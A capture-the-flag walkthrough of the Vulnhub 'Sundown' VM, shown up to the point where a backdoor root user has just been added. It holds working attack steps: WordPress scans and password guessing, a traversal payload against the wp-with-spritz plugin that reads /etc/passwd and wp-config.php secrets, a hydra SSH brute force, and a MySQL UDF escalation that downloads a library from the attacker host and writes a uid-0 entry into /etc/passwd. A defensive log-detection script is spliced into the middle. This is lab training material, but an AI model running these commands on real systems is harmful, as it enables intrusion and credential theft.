Vulnhub Sundown walkthrough

Sundown

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ sudo netdiscover -i eth1
3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor
 192.168.56.100  08:00:27:f8:c9:80      1      60  PCS Systemtechnik GmbH
 192.168.56.173  08:00:27:a9:1b:c1      1      60  PCS Systemtechnik GmbH

Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.173.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.173 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-12 08:31 EST
Nmap scan report for bogon (192.168.56.173)
Host is up (0.00012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 90:ba:81:81:b6:ec:5b:33:87:f8:73:3d:82:ca:e5:dd (RSA)
|   256 e1:bd:70:79:91:22:86:c8:e1:f5:80:ed:4a:b7:dd:ad (ECDSA)
|_  256 9f:03:af:27:89:8a:8e:b5:c0:68:05:44:74:d3:6b:d7 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-title: Sundown – Just another WordPress site
MAC Address: 08:00:27:A9:1B:C1 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.98 seconds

The target host has two open ports: 22 (SSH) and 80 (HTTP).

Get Access

┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ curl http://192.168.56.173/robots.txt
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php

┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ wpscan --url http://192.168.56.173 -e u,p                                                
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.173/ [192.168.56.173]
[+] Started: Sat Nov 12 08:37:30 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://192.168.56.173/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.173/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.173/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.173/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.173/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.173/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
 |  - http://192.168.56.173/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: twentynineteen
 | Location: http://192.168.56.173/wp-content/themes/twentynineteen/
 | Last Updated: 2022-05-24T00:00:00.000Z
 | Readme: http://192.168.56.173/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 2.3
 | Style URL: http://192.168.56.173/wp-content/themes/twentynineteen/style.css?ver=1.5
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.173/wp-content/themes/twentynineteen/style.css?ver=1.5, Match: 'Version: 1.5'

[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] wp-with-spritz
 | Location: http://192.168.56.173/wp-content/plugins/wp-with-spritz/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2015-08-20T20:15:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 4.2.4 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.56.173/wp-content/plugins/wp-with-spritz/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <====================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.56.173/wp-json/wp/v2/users/?per_page=100&page=1
 |  Rss Generator (Aggressive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Nov 12 08:37:33 2022
[+] Requests Done: 52
[+] Cached Requests: 8
[+] Data Sent: 13.283 KB
[+] Data Received: 361.348 KB
[+] Memory used: 235.969 MB
[+] Elapsed time: 00:00:03
                                                  

The username admin was found; let's see whether its password can be cracked:

┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ wpscan --url http://192.168.56.173 -U admin -P /usr/share/wordlists/rockyou.txt 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.173/ [192.168.56.173]
[+] Started: Sat Nov 12 08:37:59 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://192.168.56.173/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.173/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.173/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.173/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.173/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.173/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
 |  - http://192.168.56.173/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: twentynineteen
 | Location: http://192.168.56.173/wp-content/themes/twentynineteen/
 | Last Updated: 2022-05-24T00:00:00.000Z
 | Readme: http://192.168.56.173/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 2.3
 | Style URL: http://192.168.56.173/wp-content/themes/twentynineteen/style.css?ver=1.5
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.173/wp-content/themes/twentynineteen/style.css?ver=1.5, Match: 'Version: 1.5'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] wp-with-spritz
 | Location: http://192.168.56.173/wp-content/plugins/wp-with-spritz/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2015-08-20T20:15:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 4.2.4 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.56.173/wp-content/plugins/wp-with-spritz/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <===================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s
^CTrying admin / skittle1 Time: 00:04:49 <                                        > (43645 / 14344392)  0.30%  ETA: 26:20:43
[i] No Valid Passwords Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Nov 12 08:42:53 2022
[+] Requests Done: 43797
[+] Cached Requests: 39
[+] Data Sent: 22.229 MB
[+] Data Received: 25.742 MB
[+] Memory used: 257.387 MB
[+] Elapsed time: 00:04:54

Scan Aborted: Canceled by User
                                                          

The password was not cracked, but note that wpscan found a plugin, wp-with-spritz.

Does it have any known vulnerabilities?

https://www.exploit-db.com/exploits/44544
1. Version Disclosure

/wp-content/plugins/wp-with-spritz/readme.txt

2. Source Code

if(isset($_GET['url'])){
$content=file_get_contents($_GET['url']);

3. Proof of Concept

/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec

This plugin has a file inclusion vulnerability:

┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ curl http://192.168.56.173/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
carlos:x:1000:1000:carlos,,,:/home/carlos:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
mysql:x:0:0:MySQL Server,,,:/nonexistent:/bin/false
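The read above works because the plugin hands `$_GET['url']` straight to `file_get_contents()` with no validation, so the same parameter serves both local file reads and arbitrary remote fetches. The Python script below is an added example, not code from the original write-up or from the plugin: `is_safe_fetch_url` is the check a fixed plugin would enforce (absolute http(s) URL to an allowlisted host, no `..` segments), `scan_access_log` applies that check to Apache access-log lines to flag attempts against `wp.spritz.content.filter.php`, and `xmlrpc_burst_sources` counts `POST /xmlrpc.php` per client, which is what the XML-RPC password attack run with wpscan earlier looks like from the server side. `ALLOWED_HOSTS`, the log lines and the burst threshold are assumptions constructed for the example.

```python
"""Added example: validator and access-log checks for the wp-with-spritz url
parameter and for XML-RPC password-guessing bursts (not from the original post)."""
import re
from urllib.parse import parse_qs, unquote, urlparse

# Assumption for the example: the only remote host the site may fetch content from.
ALLOWED_HOSTS = {"example.org"}

# Endpoint named in the exploit-db entry quoted in the write-up, and WordPress' XML-RPC endpoint.
SPRITZ_PATH = "/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php"
XMLRPC_PATH = "/xmlrpc.php"

# Apache combined log format: client, identd, user, [time], "METHOD target proto", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def is_safe_fetch_url(raw: str) -> bool:
    """Accept only absolute http(s) URLs to an allowlisted host with no '..' path segment.

    Relative paths (the traversal in the write-up), file:// or php:// wrappers,
    localhost and unknown hosts are all rejected, which closes both the
    local-file-read and the remote-fetch (SSRF) use of the parameter.
    """
    parsed = urlparse(unquote(raw))
    if parsed.scheme not in ("http", "https"):
        return False
    host = (parsed.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        return False
    if ".." in parsed.path.split("/"):
        return False
    return True


def scan_access_log(lines):
    """Return (client_ip, status, decoded url value) for every request to the
    spritz endpoint whose url= value fails is_safe_fetch_url()."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable combined-format line
        target = urlparse(m.group("target"))
        if target.path != SPRITZ_PATH:
            continue
        for value in parse_qs(target.query).get("url", []):
            if not is_safe_fetch_url(value):
                hits.append((m.group("ip"), int(m.group("status")), unquote(value)))
    return hits


def xmlrpc_burst_sources(lines, threshold=20):
    """Return {ip: count} for clients that POSTed to xmlrpc.php at least `threshold`
    times in the given lines. Counting is over the supplied lines only; a production
    rule would additionally window by time."""
    counts = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("method") != "POST":
            continue
        if urlparse(m.group("target")).path == XMLRPC_PATH:
            counts[m.group("ip")] = counts.get(m.group("ip"), 0) + 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


# Constructed access-log lines modelled on the requests made in the write-up.
SAMPLE_LOG = [
    '192.168.56.137 - - [12/Nov/2022:08:45:01 -0500] "GET /wp-content/plugins/wp-with-spritz/'
    'wp.spritz.content.filter.php?url=/../../../..//etc/passwd HTTP/1.1" 200 1831 "-" "curl/7.85.0"',
    '192.168.56.137 - - [12/Nov/2022:08:46:10 -0500] "GET /wp-content/plugins/wp-with-spritz/'
    'wp.spritz.content.filter.php?url=http://example.org/post.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.56.137 - - [12/Nov/2022:08:47:22 -0500] "GET /wp-content/plugins/wp-with-spritz/'
    'wp.spritz.content.filter.php?url=http://127.0.0.1/ HTTP/1.1" 200 88 "-" "curl/7.85.0"',
    '192.168.56.137 - - [12/Nov/2022:08:48:00 -0500] "GET /index.php HTTP/1.1" 200 4021 "-" "Mozilla/5.0"',
]

# Constructed: 25 XML-RPC POSTs from one client in one minute, 1 from another.
XMLRPC_LOG = [
    f'192.168.56.137 - - [12/Nov/2022:08:38:{i:02d} -0500] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"'
    for i in range(25)
] + ['10.0.0.5 - - [12/Nov/2022:08:39:00 -0500] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"']

if __name__ == "__main__":
    for ip, status, url in scan_access_log(SAMPLE_LOG):
        print(f"{ip} status={status} suspicious url={url!r}")
    for ip, n in xmlrpc_burst_sources(SAMPLE_LOG + XMLRPC_LOG).items():
        print(f"{ip} made {n} POST requests to {XMLRPC_PATH}")
```

Note that the response code is part of the signal: the traversal request in the write-up returned 200 with the file body, so a 200 to this endpoint with a non-http `url=` value is a confirmed read, not just an attempt.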

A user carlos exists; check whether there is a private key:

┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ curl http://192.168.56.173/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//home/carlos/.ssh/id_rsam

Nothing found; try logging in over SSH as carlos:

┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ hydra -l carlos -P /usr/share/wordlists/rockyou.txt 192.168.56.173 ssh
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-12 08:50:47
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.173:22/
[22][ssh] host: 192.168.56.173   login: carlos   password: carlos
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-12 08:51:08

Using hydra, the password of user carlos is cracked: carlos

┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ ssh carlos@192.168.56.173                                  
The authenticity of host '192.168.56.173 (192.168.56.173)' can't be established.
ED25519 key fingerprint is SHA256:LrAN6VcuvH1BM5LTmD54ngGS/pZZXNvsATpRvEIuwhg.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.173' (ED25519) to the list of known hosts.
carlos@192.168.56.173's password: 
Linux sundown 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Aug  3 19:39:26 2020 from 192.168.100.139
carlos@sundown:~$ id
uid=1000(carlos) gid=1000(carlos) groups=1000(carlos),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)

Successfully obtained a shell as carlos.

Privilege escalation

Upload the linpeas.sh script to the target host, make it executable, and run it.

Not much came of it, but one thing is worth noting: mysql is actually a superuser.

╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash                                                                                                                                                                                                   
mysql:x:0:0:MySQL Server,,,:/nonexistent:/bin/false

And wp-config.php cannot be read:

carlos@sundown:/var/www/html/wordpress$ ls -alh wp-config.php 
-rw-r----- 1 www-data www-data 3.3K Aug  3  2020 wp-config.php

But in fact we can read that file via the file inclusion vulnerability (used earlier to read /etc/passwd):

┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ curl http://192.168.56.173/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//var/www/html/wordpress/wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress_db' );

/** MySQL database username */
define( 'DB_USER', 'root' );

/** MySQL database password */
define( 'DB_PASSWORD', 'VjFSQ2IyRnNUak5pZWpCTENnPT0K' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

define( 'WP_HOME', 'http://' . $_SERVER['HTTP_HOST'] );
define( 'WP_SITEURL', 'http://' . $_SERVER['HTTP_HOST'] );
define( 'WP_HTTP_BLOCK_EXTERNAL', true);

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'Ki6(+lcPzEIJZr++d}5b=k]ve+=qj+^iV#4=-@Ir>N7]`am^ir-?h*rgL*O1=eW|');
define('SECURE_AUTH_KEY',  'F{1rBAEK#q_QUSGUJ`PkH}N%&m27mE8=5xc+P$n`3g9#]X59#!pkE(Kz-OGa!CzU');
define('LOGGED_IN_KEY',    'e.s%#mQ$#MMrKG3jf@6jAx[d}A7rODFO&|Y1|@->3KShCg<z }o5M*:j#1G2Am9;');
define('NONCE_KEY',        '$|Vq+u:J-+GY^0&zk2.JNp}-/rjCyyEjeZ/:UdqHM?INN*,V|-*yp1@IYjc8<MYI');
define('AUTH_SALT',        'Oa2[X]i$+>XTA?j|1EDScmJ_4jXA),J5t0[B8uhcI- vhbXELvF?bR:Mszjgx1gS');
define('SECURE_AUTH_SALT', 'F9A.5/`YNxdr3<PMz0[Vj`-aL`vUQ <pT$JF(KZ2,c7IJ)cEL+SgFYbvf]KQO|F+');
define('LOGGED_IN_SALT',   'W4H:NhcaynZCD-1}/1.N&O4t<oO-YKbkqPgIk_Zi#$>;ANIvjLA}=]6QG:Sr#J1=');
define('NONCE_SALT',       '7GU.TppPZCBb,Aebxjb9*$cP/x *3&iSN$`?f&L(*%cI7}LfBGyBz=A^[QxuW;tB');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

Here we have the database username (root) and password, but is it also the system root password? Trying it failed, but we can log in to the database and take a look.

Download the lib_mysqludf_sys_64.so file from the internet and upload it to the target host.

carlos@sundown:/var/www/html/wordpress$ mysql -uroot -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 69132
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress_db       |
+--------------------+
4 rows in set (0.002 sec)

MariaDB [(none)]> 
MariaDB [(none)]> quit
Bye
carlos@sundown:/var/www/html/wordpress$ cd /tmp
carlos@sundown:/tmp$ curl http://192.168.56.137:8000/lib_mysqludf_sys_64.so -O
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  8040  100  8040    0     0   713k      0 --:--:-- --:--:-- --:--:--  713k
carlos@sundown:/tmp$ ls
lib_mysqludf_sys_64.so  linpeas.sh  systemd-private-43c4c00ed9944d5da4ba9dd69d04d655-apache2.service-TfZ0pc  systemd-private-43c4c00ed9944d5da4ba9dd69d04d655-systemd-timesyncd.service-XFeS9G
carlos@sundown:/tmp$ mysql -uroot -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 69133
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> SHOW VARIABLES LIKE '%plugin%';
+-----------------+---------------------------------------------+
| Variable_name   | Value                                       |
+-----------------+---------------------------------------------+
| plugin_dir      | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ |
| plugin_maturity | gamma                                       |
+-----------------+---------------------------------------------+
2 rows in set (0.001 sec)

MariaDB [(none)]> create table potato(line blob);
ERROR 1046 (3D000): No database selected
MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [mysql]> create table potato(line blob);
Query OK, 0 rows affected (0.014 sec)

MariaDB [mysql]> insert into potato values(load_file(‘/tmp/lib_mysqludf_sys_64.so’));
ERROR 1054 (42S22): Unknown column '‘' in 'field list'
MariaDB [mysql]> insert into potato values(load_file('/tmp/lib_mysqludf_sys_64.so'));
Query OK, 1 row affected (0.003 sec)

MariaDB [mysql]> SHOW VARIABLES LIKE ‘%plugin%’;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '‘%plugin%’' at line 1
MariaDB [mysql]> SHOW VARIABLES LIKE '%plugin%';
+-----------------+---------------------------------------------+
| Variable_name   | Value                                       |
+-----------------+---------------------------------------------+
| plugin_dir      | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ |
| plugin_maturity | gamma                                       |
+-----------------+---------------------------------------------+
2 rows in set (0.000 sec)

MariaDB [mysql]> select * from potato into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_64.so';
Query OK, 1 row affected (0.000 sec)

MariaDB [mysql]> create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';
Query OK, 0 rows affected (0.000 sec)

MariaDB [mysql]> select sys_exec(‘echo “Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash” >> /etc/passwd’);
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ':ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash” >> /etc/passwd’)' at line 1
MariaDB [mysql]> select sys_exec('echo “Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash” >> /etc/passwd');
+---------------------------------------------------------------------------------------------+
| sys_exec('echo “Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash” >> /etc/passwd')     |
+---------------------------------------------------------------------------------------------+
|                                                                                           0 |
+---------------------------------------------------------------------------------------------+
1 row in set (0.001 sec)

MariaDB [mysql]> quit
Bye
carlos@sundown:/tmp$ cat /etc/passwd
